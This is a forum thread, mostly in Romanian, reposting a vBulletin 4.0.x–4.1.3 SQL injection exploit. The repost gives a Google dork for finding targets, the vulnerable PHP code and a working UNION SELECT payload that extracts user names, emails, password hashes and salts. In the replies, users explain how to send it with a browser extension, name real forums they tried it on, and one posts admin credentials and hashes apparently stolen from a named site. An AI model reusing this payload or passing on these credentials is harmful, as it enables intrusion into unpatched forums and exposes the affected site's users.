Nytro Posted July 21, 2011 Report Share Posted July 21, 2011 Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day# Google Dork: intitle: powered by Vbulletin 4# Date: 20/07/2011# Author: FB1H2S # Software Link: [[url]http://www.vbulletin.com/][/url]# Version: [4.x.x]# Tested on: [relevant os]# CVE : [[url=http://members.vbulletin.com/]]Please Log In[/url]######################################################################################################Vulnerability:######################################################################################################Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.#####################################################################################################Vulnerable Code:#####################################################################################################File: /vbforum/search/type/socialgroupmessage.phpLine No: 388Paramater : messagegroupid if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0) { $value = $registry->GPC['messagegroupid']; if (!is_array($value)) { $value = array($value); } if (!(in_array(' ',$value) OR in_array('',$value))) { if ($rst = $vbulletin->db->query_read(" SELECT socialgroup.name FROM " . TABLE_PREFIX."socialgroup AS socialgroup---> WHERE socialgroup.groupid IN (" . implode(', ', $value) .")") }############################################################################################Exploitation:############################################################################################Post data on: -->search.php?search_type=1 --> Search Single Content TypeKeywords : Valid Group MessageSearch Type : Group MessagesSearch in Group : Valid Group Id&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1###########################################################################################More Details:##########################################################################################[url]Http://www.Garage4Hackers.com[/url][url=http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day]Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day[/url]###########################################################################################Note:###########################################################################################Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hencecustomers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".Sursa: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day Quote Link to comment Share on other sites More sharing options...
Oust Posted July 21, 2011 Report Share Posted July 21, 2011 Cum se foloseste, se baga intr-un program ceva? Sau este doar un url vulnerabil ?Stiam ca unele merg cu python. Quote Link to comment Share on other sites More sharing options...
Skiddie Posted July 21, 2011 Report Share Posted July 21, 2011 @Oust: cu tamper data. Quote Link to comment Share on other sites More sharing options...
Mr.KyKy Posted July 22, 2011 Report Share Posted July 22, 2011 La vbulletin 4.0.x mai e si ala cu grupu si numele la utilizator. Quote Link to comment Share on other sites More sharing options...
icebird Posted July 22, 2011 Report Share Posted July 22, 2011 Daca nu iese un un rip sau ceva cu noul patch sa vezi ce futere va fi pentru astia care nu au licenta. Quote Link to comment Share on other sites More sharing options...
Zatarra Posted July 22, 2011 Report Share Posted July 22, 2011 Ms Nytro. Daca a reusit careva PM me sa facem o susta Quote Link to comment Share on other sites More sharing options...
XandZero Posted July 22, 2011 Report Share Posted July 22, 2011 eu am reusit mai demult pe un forum , se foloseste cu tamper data [ extesion pt firefox]edit " niste forumuri cu 4.0.x => 4.1.3 , vulnerabile ? , si daca reusesc fac si Video. Quote Link to comment Share on other sites More sharing options...
icebird Posted July 22, 2011 Report Share Posted July 22, 2011 eu am reusit mai demult pe un forum , se foloseste cu tamper data [ extesion pt firefox]edit " niste forumuri cu 4.0.x => 4.1.3 , vulnerabile ? , si daca reusesc fac si Video.# Google Dork: intitle: powered by Vbulletin 4 Quote Link to comment Share on other sites More sharing options...
XandZero Posted July 22, 2011 Report Share Posted July 22, 2011 (edited) scz ca fac reclama , dar pe extremecs.ro/forum , forum.gameszone.ro , Nu mere Exploitu , mai incerc si pe altele.. ca's o gramadaedit : am reusitAdmin:5bf6785b83c4c9ba1d509e36b84b33e1:28)y5P:#Hg9)sllsoOT#D3@6, MASTER_007:2024d1917fbace5acfa274cd955bd5dc:C~w7}jI]NI@e54D=LdXX`a5%^BzNL7, http://www.crewforum.ro/ Edited July 22, 2011 by XandZero Quote Link to comment Share on other sites More sharing options...
